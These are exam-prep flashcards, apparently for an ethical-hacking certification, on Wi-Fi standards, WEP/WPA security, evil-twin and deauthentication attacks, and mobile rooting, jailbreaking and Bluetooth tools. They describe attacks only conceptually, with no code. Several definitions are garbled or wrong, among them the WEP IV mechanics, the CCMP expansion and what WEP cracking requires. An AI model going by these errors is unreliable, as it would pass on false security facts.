Chapter 7 - Wireless Network Hacking Flashcards
List the speeds, frequencies and modulation type for the following
- 11a
- 11b
- 11g
- 11n
- 11ac
- 11a - 54, 5Ghz, OFDM
- 11b - 11, 2.4Ghz, DSSS
- 11g - 54, 2.4Ghz, OFDM and DSSS
- 11n - 100+, 2.4 - 5Ghz, OFDM
- 11ac - 1000, 5Ghz, QAM
Exam Tip
- 11i
- 16
- 11i - amendment for security mechanisms on WLANs
802. 16 - WiMax, speeds started at 40Mbs and are moving to gigabit
Define Orthogonal Frequency Division Multiplexing (OFDM)
several waveforms simultaneously carry messages.
Transmission media is divided into a series of frequency bands that don’t overlap each other and each can carry a separate signal
Define Direct Sequence Spread Spectrum (DSSS)
DSSS combines all available waveforms into a single purpose. Entire bandwidth can be used at once for the delivery of a message
Define Basic Service Area (BSA)
Define Basic Service Set (BSS)
BSA - single access point coverage
BSS - communication between single AP and its clients
Define Extended Service Set (ESS)
when multiple AP’s are setup with correct channels and a client can associate and disassociate from each one as it roams between them.
Define BSSID
the MAC Address of the WAP at the center of your BSS
Define dipole and Parabolic dish antennas
dipole - 23 signal ‘towers’ and are omnidirectional
parabolic dish - like a satellite dish, directional, tremendous range
Define Service Set Identifier (SSID)
text string that identifies the wireless network
Compare Association and Authentication for a WLAN
Association - act of client connecting to an AP
Authentication - client is identified before it can access anything on the network
Wired Equivalent Privacy (WEP) encryption notes
Intended to only give equivalent privacy as a wired hub
uses Initialization Vector (IV)
WEP IV issues
IV does a 32 bit integrity check value (ICV) and appends it to data payload
the provides 24 bit IV, combined with key in RC4
key stream is encrypted by XOR and combined with ICV.
But IV is small and RC4 easy to break. So WEP is easily cracked. Attacker captures enough packets to analyze IV and gets the key
WiFi Protected Access (WPA)
Uses TKIP, a 128 bit key and client’s MAC address for encryption
Changes the key every 10,000 packets (hence Temporary)
Keys are transferred back and forth during EAP authentication session, which 4 step handshake proves the client belongs to the AP and vice versa
TKIP
Temporal Key Integrity Protocol
Originally had some vulnerabilities
WiFi Protected Access 2 (WPA2)
Uses AES, FIPS 140-2 compliant
WPA2-Enterprise - you can tie EAP or RADIUS server into authentication
WPA2-Personal - uses preshared key
Uses CCMP (Cipher Blockchaining Message Authentication Code Protocol). Uses hashes (aka message integrity codes) to ensure integrity
Different Attacks
Evil Twin (aka mis-association attack) Ad-Hoc
Evil Twin - setup WAP, that looks like legitimate one, have victims associate to it and use your spoofed DNS settings, capture their packets, etc.
ad-hoc - attacker sets laptop up and advertises his ad-hoc laptop network. Shouldn’t work, but often does
“honeyspot” attack
faking a well-known hotspot like Starbucks or ATT
Wireless Denial of Service attacks
disassociate
unauthorized association
jamming the wireless signal
disassociate - craft and send packets to client that forces them to drop their connections
unauthorized association
Use a rogue AP to have legitimate users connect, which removes their access to a legitimate AP
Wireless sniffing tools
OmniPeek
AirMagnet
WiFi Analyzer Pro
WiFi Pilot
OmniPeek - also shows network activity status and monitoring
AirMagnet - from Fluke. Also has compliance reporting engine
WiFi Analyzer Pro
WiFi Pilot
Tools for rooting Android
SuperOneClick
Superboot, OneClickRoot, Kingo, unprovoked, RescueRoot, UnlockRootPro
3 Types of jailbreaking iOS
Userland (user-level access but not admin)
iBoot, Bootrom both grant admin privileges
3 Techniques for jailbreaking iOS
untethered - kernel remains patched (jailbroken) after reboot with or without a system connection
semi-tethered - reboot doesn’t retain patched kernel, but software is already added to device. So if admin privileges are needed, the installed jailbreaking tool can be used
tethered - reboot removes all jailbreaking patches and phone may get stuck in constant loop on startup, requiring USB (system) connection to fix
jailbreaking tools
evasi0n7
GeekSn0w
Pangu
Redsn0w
Absinthe
Cydia
Mobile Device Management for securing mobile devices
can be used to push out security policies, application deployment and monitoring
XenMobile
MaaS360
AirWatch
MobiControl
3 Techniques for jailbreaking iOS
untethered - kernel remains patched (jailbroken) after reboot with or without a system connection
semi-tethered - reboot doesn’t retain patched kernel, but software is already added to device. So if admin privileges are needed, the installed jailbreaking tool can be used
tethered - reboot removes all jailbreaking patches and phone may get stuck in constant loop on startup, requiring USB (system) connection to fix
jailbreaking tools for iOS
evasi0n7
GeekSn0w
Pangu
Redsn0w
Absinthe
Cydia
Bluetooth Tools
BlueScanner BT Browser Bluesniff, btCrawler Blooover PhoneSnoop
BlueScanner - finding devices, tries to extract and display as much as possible
BT Browser - finding, enumerating devices
Bluesniff, btCrawler - similar but with GUIs
Blooover - blue bugging
PhoneSnoop - spyware on a blackberry
Bluetooth Tools
BlueScanner BT Browser Bluesniff, btCrawler Blooover PhoneSnoop BBProxy
BlueScanner - finding devices, tries to extract and display as much as possible
BT Browser - finding, enumerating devices
Bluesniff, btCrawler - similar but with GUIs
Blooover - blue bugging
PhoneSnoop, BBProxy - spyware on a blackberry
Personal tips
know what CCMP, EAP, MIC do
know what you need to crack WEP
know which tools are good for which techniques
which wireless protocols use which type of encryption
which tools give root on mobile devices
jailbreaking techniques
know what CCMP, EAP, MIC do
(MIC. Message Integrity Codes. provides integrity checking in WPA via sequence numbers. It is used by CCMP)
know what you need to crack WEP
(MAC, SSID)
know which tools are good for which techniques
which wireless protocols use which type of encryption
which tools give root on mobile devices
jailbreaking techniques
Define Untethered Jailbreaking Technique
untethered - kernel remains patched (jailbroken) after reboot with or without a system connection
Define Semi-Tethered Jailbreaking Technique
semi-tethered - reboot doesn’t retain patched kernel, but software is already added to device. So if admin privileges are needed, the installed jailbreaking tool can be used
Define Tethered Jailbreaking Technique
tethered - reboot removes all jailbreaking patches and phone may get stuck in constant loop on startup, requiring USB (system) connection to fix